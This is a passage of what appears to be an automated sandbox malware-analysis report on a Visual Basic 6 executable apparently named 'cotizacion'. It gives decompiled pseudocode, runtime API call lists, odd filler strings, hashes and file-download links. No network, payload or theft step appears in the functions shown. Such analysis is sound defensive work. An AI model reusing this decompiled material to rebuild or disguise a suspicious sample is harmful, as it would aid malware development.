				intOrPtr* _v76;
				signed int _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t81;
				signed int _t85;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				char* _t105;
				signed int* _t115;
				signed int _t118;
				signed int _t124;

				_t124 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_push(0x5c);
				L004016F0();
				_v12 = _t115;
				_v8 = 0x401550;
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v68 =  *_v88;
				_t81 =  *((intOrPtr*)( *_v68 + 0x14))(_v68,  &_v32);
				asm("fclex");
				_v72 = _t81;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v92 = _t81;
				}
				_v76 = _v32;
				_t85 =  *((intOrPtr*)( *_v76 + 0x138))(_v76, L"Challa", 1);
				asm("fclex");
				_v80 = _t85;
				_t118 = _v80;
				if(_t118 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x411840);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v96 = _t85;
				}
				_t105 =  &_v32;
				L004018AC();
				_v40 = 1;
				_v48 = 2;
				_push( &_v48);
				asm("fld1");
				_push(_t105);
				_push(_t105);
				 *_t115 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v72 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v80 = _t124;
				_push(_t105);
				_push(_t105);
				_v88 =  *0x401548;
				L0040180A();
				L0040193C();
				asm("fcomp qword [0x401540]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t118 == 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_v100 = 1;
				}
				_v68 =  ~_v100;
				L00401912();
				_t89 = _v68;
				if(_t89 != 0) {
					_push(0x30);
					L00401804();
					_v24 = _t89;
				}
				_push(0x4118d8);
				L004017F8();
				_push(_t89);
				L004017FE();
				L00401882();
				_push(_t89);
				_push(0x411624);
				L0040184C();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t89));
				L00401924();
				_t93 = _v68;
				if(_t93 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v68 =  *_v104;
					_t99 =  *((intOrPtr*)( *_v68 + 0x1c))(_v68,  &_v32);
					asm("fclex");
					_v72 = _t99;
					if(_v72 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v108 = _t99;
					}
					_v76 = _v32;
					_t93 =  *((intOrPtr*)( *_v76 + 0x50))(_v76);
					asm("fclex");
					_v80 = _t93;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x411818);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t93;
					}
					L004018AC();
				}
				asm("wait");
				_push(0x4154ea);
				return _t93;
			}

0x00415287
0x0041528c
0x00415297
0x00415298
0x0041529f
0x004152a2
0x004152aa
0x004152ad
0x004152bb
0x004152d5
0x004152bd
0x004152bd
0x004152c2
0x004152c7
0x004152cc
0x004152cc
0x004152e1
0x004152f0
0x004152f3
0x004152f5
0x004152fc
0x00415315
0x004152fe
0x004152fe
0x00415300
0x00415305
0x00415308
0x0041530b
0x00415310
0x00415310
0x0041531c
0x0041532e
0x00415334
0x00415336
0x00415339
0x0041533d
0x00415359
0x0041533f
0x0041533f
0x00415344
0x00415349
0x0041534c
0x0041534f
0x00415354
0x00415354
0x0041535d
0x00415360
0x00415365
0x0041536c
0x00415376
0x00415377
0x00415379
0x0041537a
0x0041537b
0x0041537e
0x00415380
0x00415381
0x00415382
0x00415385
0x00415387
0x00415388
0x00415389
0x00415392
0x00415393
0x00415394
0x00415397
0x0041539c
0x004153a1
0x004153a7
0x004153a9
0x004153aa
0x004153b5
0x004153ac
0x004153ac
0x004153ac
0x004153be
0x004153c5
0x004153ca
0x004153d0
0x004153d2
0x004153d4
0x004153dc
0x004153dc
0x004153df
0x004153e4
0x004153e9
0x004153ea
0x004153f4
0x004153f9
0x004153fa
0x004153ff
0x00415406
0x0041540c
0x00415413
0x00415418
0x0041541e
0x0041542b
0x00415445
0x0041542d
0x0041542d
0x00415432
0x00415437
0x0041543c
0x0041543c
0x00415451
0x00415460
0x00415463
0x00415465
0x0041546c
0x00415485
0x0041546e
0x0041546e
0x00415470
0x00415475
0x00415478
0x0041547b
0x00415480
0x00415480
0x0041548c
0x00415497
0x0041549a
0x0041549c
0x004154a3
0x004154bc
0x004154a5
0x004154a5
0x004154a7
0x004154ac
0x004154af
0x004154b2
0x004154b7
0x004154b7
0x004154c3
0x004154c3
0x004154c8
0x004154c9
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004152A2
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,004016F6), ref: 004152C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 0041530B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,00000138), ref: 0041534F
__vbaFreeObj.MSVBVM60(00000000,?,00411840,00000138), ref: 00415360
#673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415397
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 0041539C
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004153C5
#571.MSVBVM60(00000030,?,?,?,?,?,?,?,?,00000002), ref: 004153D4
__vbaI4Str.MSVBVM60(004118D8,?,?,?,?,?,?,?,?,00000002), ref: 004153E4
#697.MSVBVM60(00000000,004118D8,?,?,?,?,?,?,?,?,00000002), ref: 004153EA
__vbaStrMove.MSVBVM60(00000000,004118D8,?,?,?,?,?,?,?,?,00000002), ref: 004153F4
__vbaStrCmp.MSVBVM60(00411624,00000000,00000000,004118D8,?,?,?,?,?,?,?,?,00000002), ref: 004153FF
__vbaFreeStr.MSVBVM60(00411624,00000000,00000000,004118D8,?,?,?,?,?,?,?,?,00000002), ref: 00415413
__vbaNew2.MSVBVM60(004116D4,004183D8,00411624,00000000,00000000,004118D8,?,?,?,?,?,?,?,?,00000002), ref: 00415437
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C,?,?,?,?,?,?,?,?,00000002), ref: 0041547B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,00000050,?,?,?,?,?,?,?,?,00000002), ref: 004154B2
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004154C3

Strings

Challa, xrefs: 00415321

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2$#571#673#697ChkstkMove
String ID: Challa
API String ID: 3491129088-2699440810
Opcode ID: 73a089b26144c66e9405a7ff98b365fc1a783d7b03b86ef82c54320a9eeca26f
Instruction ID: 5dda2a4c5c5c0ed0136b6e60a07554f565dadc68472790dba92f00a2e9442782
Opcode Fuzzy Hash: 73a089b26144c66e9405a7ff98b365fc1a783d7b03b86ef82c54320a9eeca26f
Instruction Fuzzy Hash: EB612770D5060CEFDB00EF95C849BEEBBB4AF04705F10852AE015BB2A1DBB95986DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00416895, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00416895(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				short _v92;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _t103;
				signed int _t108;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t140;
				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L004016F0();
				_v16 = _t143;
				_v12 = 0x401680;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4016f6, _t140);
				if( *0x4183d8 != 0) {
					_v108 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v108 = 0x4183d8;
				}
				_v76 =  *_v108;
				_t103 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t103;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v112 = _t103;
				}
				_v84 = _v40;
				_t108 =  *((intOrPtr*)( *_v84 + 0x50))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t108;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x411840);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v116 = _t108;
				}
				_push(_v36);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v92 =  ~( ~_t108 + 1);
				L00401924();
				L004018AC();
				_t112 = _v92;
				if(_t112 != 0) {
					_v64 = L"Subvicarship";
					_v72 = 8;
					L004018A0();
					_t112 =  &_v56;
					_push(_t112);
					L0040188E();
					L00401912();
				}
				_push(0x411624);
				L0040179E();
				if(_t112 != 0x61) {
					_t127 =  *((intOrPtr*)( *_a4 + 0x720))(_a4);
					_v76 = _t127;
					if(_v76 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x720);
						_push(0x4101ac);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v120 = _t127;
					}
				}
				if( *0x4183d8 != 0) {
					_v124 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v124 = 0x4183d8;
				}
				_v76 =  *_v124;
				_t118 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t118;
				if(_v80 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v128 = _t118;
				}
				_v84 = _v40;
				_t123 =  *((intOrPtr*)( *_v84 + 0xe8))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t123;
				if(_v88 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411840);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v132 = _t123;
				}
				_t124 = _v36;
				_v104 = _t124;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_v28 =  *0x401678;
				asm("wait");
				_push(0x416b07);
				L00401924();
				return _t124;
			}

0x00416898
0x004168a7
0x004168b1
0x004168b9
0x004168bc
0x004168c3
0x004168d2
0x004168dc
0x004168f6
0x004168de
0x004168de
0x004168e3
0x004168e8
0x004168ed
0x004168ed
0x00416902
0x00416911
0x00416914
0x00416916
0x0041691d
0x00416936
0x0041691f
0x0041691f
0x00416921
0x00416926
0x00416929
0x0041692c
0x00416931
0x00416931
0x0041693d
0x0041694c
0x0041694f
0x00416951
0x00416958
0x00416971
0x0041695a
0x0041695a
0x0041695c
0x00416961
0x00416964
0x00416967
0x0041696c
0x0041696c
0x00416975
0x00416978
0x0041697a
0x00416981
0x00416986
0x0041698d
0x00416995
0x0041699a
0x004169a0
0x004169a2
0x004169a9
0x004169b6
0x004169bb
0x004169be
0x004169bf
0x004169c7
0x004169c7
0x004169cc
0x004169d1
0x004169da
0x004169e4
0x004169ea
0x004169f1
0x00416a0d
0x004169f3
0x004169f3
0x004169f8
0x004169fd
0x00416a00
0x00416a03
0x00416a08
0x00416a08
0x004169f1
0x00416a18
0x00416a32
0x00416a1a
0x00416a1a
0x00416a1f
0x00416a24
0x00416a29
0x00416a29
0x00416a3e
0x00416a4d
0x00416a50
0x00416a52
0x00416a59
0x00416a72
0x00416a5b
0x00416a5b
0x00416a5d
0x00416a62
0x00416a65
0x00416a68
0x00416a6d
0x00416a6d
0x00416a79
0x00416a88
0x00416a8e
0x00416a90
0x00416a97
0x00416ab3
0x00416a99
0x00416a99
0x00416a9e
0x00416aa3
0x00416aa6
0x00416aa9
0x00416aae
0x00416aae
0x00416ab7
0x00416aba
0x00416abd
0x00416ac7
0x00416acf
0x00416ada
0x00416add
0x00416ade
0x00416b01
0x00416b06

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004168B1
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,004016F6), ref: 004168E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 0041692C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,00000050), ref: 00416967
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0041697A
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041698D
__vbaFreeObj.MSVBVM60(00000000,?), ref: 00416995
__vbaVarDup.MSVBVM60(00000000,?), ref: 004169B6
#529.MSVBVM60(?,00000000,?), ref: 004169BF
__vbaFreeVar.MSVBVM60(?,00000000,?), ref: 004169C7
#696.MSVBVM60(00411624,00000000,?), ref: 004169D1
__vbaHresultCheckObj.MSVBVM60(00000000,00401680,004101AC,00000720), ref: 00416A03
__vbaNew2.MSVBVM60(004116D4,004183D8,00411624,00000000,?), ref: 00416A24
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 00416A68
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,000000E8), ref: 00416AA9
__vbaStrMove.MSVBVM60(00000000,?,00411840,000000E8), ref: 00416AC7
__vbaFreeObj.MSVBVM60(00000000,?,00411840,000000E8), ref: 00416ACF
__vbaFreeStr.MSVBVM60(00416B07), ref: 00416B01

Strings

Subvicarship, xrefs: 004169A2

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2$#529#696ChkstkMove
String ID: Subvicarship
API String ID: 3028026186-131754160
Opcode ID: 0a2952b8cd2676e11341f11b8c28a121eeea44c93f4c957606bf504743cfdc3e
Instruction ID: db7c138fbb14c5a7904c1a8dd894d14f4016796e44f146247d47ad1cac634732
Opcode Fuzzy Hash: 0a2952b8cd2676e11341f11b8c28a121eeea44c93f4c957606bf504743cfdc3e
Instruction Fuzzy Hash: 5C71E171D00208AFDF10EFA5C945BDDBBB0BF08745F24842AE105BB2A1DBB99985DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414A17, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00414A17(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				short _v32;
				short _v36;
				char _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v76;
				void* _v80;
				signed int _v84;
				signed int _v88;
				void* _t59;
				signed int _t65;
				signed int _t70;
				short _t71;
				signed int _t74;
				char* _t77;
				void* _t84;
				void* _t86;
				intOrPtr* _t87;

				_t87 = _t86 - 0xc;
				 *[fs:0x0] = _t87;
				L004016F0();
				_v16 = _t87;
				_v12 = 0x4014e0;
				_v8 = 0;
				_t59 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4016f6, _t84);
				L004018F4();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x411624);
				_push(_v40);
				L00401840();
				_t77 =  &_v40;
				L00401882();
				_push(_v40);
				_push(0x411838);
				L0040184C();
				if(_t59 != 0) {
					L0040183A();
					_v80 =  *0x4014d4;
					_v84 =  *0x4014d0;
					_v88 =  *0x4014cc;
					 *_t87 =  *0x4014c8;
					_t74 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t77, _t77, _t77, _t77, _t59);
					asm("fclex");
					_v52 = _t74;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x41017c);
						_push(_a4);
						_push(_v52);
						L00401906();
						_v76 = _t74;
					}
				}
				if( *0x4183d8 != 0) {
					_v80 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v80 = 0x4183d8;
				}
				_v52 =  *_v80;
				_t65 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v44);
				asm("fclex");
				_v56 = _t65;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v52);
					_push(_v56);
					L00401906();
					_v84 = _t65;
				}
				_v60 = _v44;
				_t70 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v48);
				asm("fclex");
				_v64 = _t70;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411840);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v88 = _t70;
				}
				_t71 = _v48;
				_v36 = _t71;
				L004018AC();
				_push(0x411854);
				L00401834();
				if(_t71 != 1) {
					_push(0xff8d5482);
					_push(L"samtaleemnetsrhes");
					_push(L"Hofdesserternes7");
					_push(0);
					L0040182E();
					_v28 = _t71;
				}
				_v32 = 0x1e2c;
				asm("wait");
				_push(0x414bff);
				L00401924();
				return _t71;
			}

0x00414a1a
0x00414a29
0x00414a33
0x00414a3b
0x00414a3e
0x00414a45
0x00414a54
0x00414a5f
0x00414a64
0x00414a66
0x00414a68
0x00414a6a
0x00414a6c
0x00414a71
0x00414a74
0x00414a7b
0x00414a7e
0x00414a83
0x00414a86
0x00414a8b
0x00414a92
0x00414a9a
0x00414aa7
0x00414ab1
0x00414abb
0x00414ac5
0x00414ad2
0x00414ad8
0x00414ada
0x00414ae1
0x00414afd
0x00414ae3
0x00414ae3
0x00414ae8
0x00414aed
0x00414af0
0x00414af3
0x00414af8
0x00414af8
0x00414ae1
0x00414b08
0x00414b22
0x00414b0a
0x00414b0a
0x00414b0f
0x00414b14
0x00414b19
0x00414b19
0x00414b2e
0x00414b3d
0x00414b40
0x00414b42
0x00414b49
0x00414b62
0x00414b4b
0x00414b4b
0x00414b4d
0x00414b52
0x00414b55
0x00414b58
0x00414b5d
0x00414b5d
0x00414b69
0x00414b78
0x00414b7e
0x00414b80
0x00414b87
0x00414ba3
0x00414b89
0x00414b89
0x00414b8e
0x00414b93
0x00414b96
0x00414b99
0x00414b9e
0x00414b9e
0x00414ba7
0x00414bab
0x00414bb2
0x00414bb7
0x00414bbc
0x00414bc4
0x00414bc6
0x00414bcb
0x00414bd0
0x00414bd5
0x00414bd7
0x00414bdc
0x00414bdc
0x00414bdf
0x00414be5
0x00414be6
0x00414bf9
0x00414bfe

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00414A33
__vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00414A5F
#712.MSVBVM60(00000000,00411624,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414A74
__vbaStrMove.MSVBVM60(00000000,00411624,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414A7E
__vbaStrCmp.MSVBVM60(00411838,00000000,00000000,00411624,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414A8B
__vbaFpI4.MSVBVM60(00411838,00000000,00000000,00411624,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414A9A
__vbaHresultCheckObj.MSVBVM60(00000000,004014E0,0041017C,000002C8,?,?,?,?,00000000,00411838,00000000,00000000,00411624), ref: 00414AF3
__vbaNew2.MSVBVM60(004116D4,004183D8,00411838,00000000,00000000,00411624,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414B14
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004116C4,00000014), ref: 00414B58
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411840,00000108), ref: 00414B99
__vbaFreeObj.MSVBVM60(00000000,00000000,00411840,00000108), ref: 00414BB2
__vbaLenBstr.MSVBVM60(00411854), ref: 00414BBC
__vbaInStr.MSVBVM60(00000000,Hofdesserternes7,samtaleemnetsrhes,FF8D5482,00411854), ref: 00414BD7
__vbaFreeStr.MSVBVM60(00414BFF,00411854), ref: 00414BF9

Strings

val, xrefs: 00414A57
Hofdesserternes7, xrefs: 00414BD0
samtaleemnetsrhes, xrefs: 00414BCB

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$#712BstrChkstkCopyMoveNew2
String ID: Hofdesserternes7$samtaleemnetsrhes$val
API String ID: 1974484846-2599820437
Opcode ID: 1d817ad7392d683efb775c9212690547f269687a26499612c62c37063d347463
Instruction ID: 3a936b63183273649426a30b86063e11b512535ee28d2d88032bc56803dd2eb3
Opcode Fuzzy Hash: 1d817ad7392d683efb775c9212690547f269687a26499612c62c37063d347463
Instruction Fuzzy Hash: 3E512671904208AFCB01EFA5D946FDDBBB4BF08705F20812AF545B62B0CBB99990DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004170AC, Relevance: 27.2, APIs: 18, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004170AC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t96;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				void* _t135;
				void* _t137;
				intOrPtr _t138;

				_t138 = _t137 - 0xc;
				 *[fs:0x0] = _t138;
				L004016F0();
				_v16 = _t138;
				_v12 = 0x4016e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4016f6, _t135);
				if( *0x4183d8 != 0) {
					_v92 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v92 = 0x4183d8;
				}
				_v60 =  *_v92;
				_t96 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t96;
				if(_v64 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v96 = _t96;
				}
				_v68 = _v40;
				_t101 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t101;
				if(_v72 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411840);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v100 = _t101;
				}
				_t102 = _v36;
				_v84 = _t102;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(1);
				_push(0x411b28);
				L00401786();
				L00401882();
				_push(_t102);
				_push(0x4118bc);
				L0040184C();
				asm("sbb eax, eax");
				_v60 =  ~( ~( ~_t102));
				L00401924();
				_t106 = _v60;
				if(_t106 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v60 =  *_v104;
					_t112 =  *((intOrPtr*)( *_v60 + 0x1c))(_v60,  &_v40);
					asm("fclex");
					_v64 = _t112;
					if(_v64 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v108 = _t112;
					}
					_v68 = _v40;
					_v48 = 0x80020004;
					_v56 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t118 =  *((intOrPtr*)( *_v68 + 0x5c))(_v68, 0x10,  &_v36);
					asm("fclex");
					_v72 = _t118;
					if(_v72 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411818);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v112 = _t118;
					}
					_t106 = _v36;
					_v88 = _t106;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_push(0x4172f5);
				L00401924();
				L00401924();
				return _t106;
			}

0x004170af
0x004170be
0x004170c8
0x004170d0
0x004170d3
0x004170da
0x004170e9
0x004170f3
0x0041710d
0x004170f5
0x004170f5
0x004170fa
0x004170ff
0x00417104
0x00417104
0x00417119
0x00417128
0x0041712b
0x0041712d
0x00417134
0x0041714d
0x00417136
0x00417136
0x00417138
0x0041713d
0x00417140
0x00417143
0x00417148
0x00417148
0x00417154
0x00417163
0x00417169
0x0041716b
0x00417172
0x0041718e
0x00417174
0x00417174
0x00417179
0x0041717e
0x00417181
0x00417184
0x00417189
0x00417189
0x00417192
0x00417195
0x00417198
0x004171a2
0x004171aa
0x004171af
0x004171b1
0x004171b6
0x004171c0
0x004171c5
0x004171c6
0x004171cb
0x004171d2
0x004171d8
0x004171df
0x004171e4
0x004171ea
0x004171f7
0x00417211
0x004171f9
0x004171f9
0x004171fe
0x00417203
0x00417208
0x00417208
0x0041721d
0x0041722c
0x0041722f
0x00417231
0x00417238
0x00417251
0x0041723a
0x0041723a
0x0041723c
0x00417241
0x00417244
0x00417247
0x0041724c
0x0041724c
0x00417258
0x0041725b
0x00417262
0x00417270
0x0041727a
0x0041727b
0x0041727c
0x0041727d
0x00417286
0x00417289
0x0041728b
0x00417292
0x004172ab
0x00417294
0x00417294
0x00417296
0x0041729b
0x0041729e
0x004172a1
0x004172a6
0x004172a6
0x004172af
0x004172b2
0x004172b5
0x004172bf
0x004172c7
0x004172c7
0x004172cc
0x004172e7
0x004172ef
0x004172f4

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004170C8
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,004016F6), ref: 004170FF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 00417143
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,000000E0), ref: 00417184
__vbaStrMove.MSVBVM60(00000000,?,00411840,000000E0), ref: 004171A2
__vbaFreeObj.MSVBVM60(00000000,?,00411840,000000E0), ref: 004171AA
#616.MSVBVM60(00411B28,00000001), ref: 004171B6
__vbaStrMove.MSVBVM60(00411B28,00000001), ref: 004171C0
__vbaStrCmp.MSVBVM60(004118BC,00000000,00411B28,00000001), ref: 004171CB
__vbaFreeStr.MSVBVM60(004118BC,00000000,00411B28,00000001), ref: 004171DF
__vbaNew2.MSVBVM60(004116D4,004183D8,004118BC,00000000,00411B28,00000001), ref: 00417203
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C), ref: 00417247
__vbaChkstk.MSVBVM60(00000000), ref: 00417270
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,0000005C), ref: 004172A1
__vbaStrMove.MSVBVM60(00000000,?,00411818,0000005C), ref: 004172BF
__vbaFreeObj.MSVBVM60(00000000,?,00411818,0000005C), ref: 004172C7
__vbaFreeStr.MSVBVM60(004172F5,004118BC,00000000,00411B28,00000001), ref: 004172E7
__vbaFreeStr.MSVBVM60(004172F5,004118BC,00000000,00411B28,00000001), ref: 004172EF

Memory Dump Source

